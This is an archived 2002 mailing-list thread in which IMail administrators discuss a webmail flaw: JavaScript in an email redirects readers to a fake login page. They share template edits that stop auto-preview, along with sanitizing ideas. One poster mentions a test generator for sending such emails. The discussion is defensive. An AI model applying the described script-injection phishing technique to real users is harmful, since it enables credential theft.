RE: [IMail Forum] Old Hack on Hotmail seems to work on iMail web users...

[Ron Hornbaker]

Norm,   We've got a JavaScript tag stripper function at http://hksi.net/tagstripper.htm that might come in handy if you're trying to fix this client-side. Loading the message body into a hidden or very small <textarea> tag, then dynamically writing a sanitized version to another div with JS, might be possible. Good luck getting it to work with NS, however. ;)   -Ron -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Norman J. Nolasco Sent: Saturday, March 16, 2002 4:08 PM To: [EMAIL PROTECTED] Subject: RE: [IMail Forum] Old Hack on Hotmail seems to work on iMail web users... As the russians once said... "Many tanks."  That will keep users from being "locked out".  In addition to waiting for IPSwitch to come up with some fix, I'm going to try loading <!--IMail.MailMessage--> into a CDATA field, then use the template to read/parse the mail message.  This will prevent the browser from getting to the script before I do.  The only problem is going to be the overhead to scrub the messages.   Your KWM templates rock, BTW.  The IMail tags are a dog to work with, but I'm glad they're there.   -Norm   -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron Hornbaker Sent: Saturday, March 16, 2002 3:49 PM To: [EMAIL PROTECTED] Subject: RE: [IMail Forum] Old Hack on Hotmail seems to work on iMail web users... Norm et. al.,   You can disable the automatic preview of messages in KillerWebMail by editing the msgsum.html file. Find this block of code at about line 369:   function myLoad(){  // reset reload count, because user is obviously active  parent.refreshCount=0  if(parent.previewFrame){  <!--IMAIL.BeginIfMsgCount.EQ 0-->   parent.previewFrame.location.href="readfail.html?blank=yes"  <!--IMAIL.ElseBeginIfMsgCount-->   parent.previewFrame.location.href="rmail.<!--IMAIL.Number-->.cgi?mbx="+MailboxLink+"&msgsort="+z   <!--IMAIL.EndBeginIfMsgCount-->   } }   and comment out the reload lines (changes shown in red... one of the few times I like html msgs to a list):   function myLoad(){  // reset reload count, because user is obviously active  parent.refreshCount=0  if(parent.previewFrame){  <!--IMAIL.BeginIfMsgCount.EQ 0-->   //parent.previewFrame.location.href="readfail.html?blank=yes"  <!--IMAIL.ElseBeginIfMsgCount-->   //parent.previewFrame.location.href="rmail.<!--IMAIL.Number-->.cgi?mbx="+MailboxLink+"&msgsort="+z   <!--IMAIL.EndBeginIfMsgCount-->   } }   Note that the only way to prevent this "hack" (embedded JavaScript commands) is for Ipswitch to rewrite the iwebmsg service so it parses-out all JavaScript from the message body before sending it to the browser.   Ron Hornbaker  - http://humankindsystems.com - 2,586 admins can't be wrong  - http://AnswerTrack.com - eCRM email tracking & routing  - http://KillerWebMail.com - the name says it all  - 1-888-952-4888 or [EMAIL PROTECTED] -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Norman J. Nolasco Sent: Saturday, March 16, 2002 3:30 PM To: [EMAIL PROTECTED] Subject: RE: [IMail Forum] Old Hack on Hotmail seems to work on iMail web users... Wow... it's a little worse in KWM.  I just tried a test on the [EMAIL PROTECTED] address.  Since the preview for the first message in the Inbox comes up automatically, you can't even read your other mail.  It just forwards you to the faux login page as soon as you login.  The only way to read the rest of your mail is to send yourself another message (so the preview for the malicious email doesn't automatically kick in).   Does anyone else see this as a problem or is there some easy setting that I'm not aware of to neutralize this issue?   -Norm   -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Norman J. Nolasco Sent: Saturday, March 16, 2002 2:41 PM To: [EMAIL PROTECTED] Subject: RE: [IMail Forum] Old Hack on Hotmail seems to work on iMail web users... Hi again,   I put up a new version of the email generator at http://209.16.59.28/test.asp   It can now send the same type of email to KillerWebMail users, as well as default template users.  Again, even if the login screen doesn't use the same template, all a malicious user has to do is cut&paste the HTML off the login page onto their own version.   Norman Nolasco Advarion Incorporated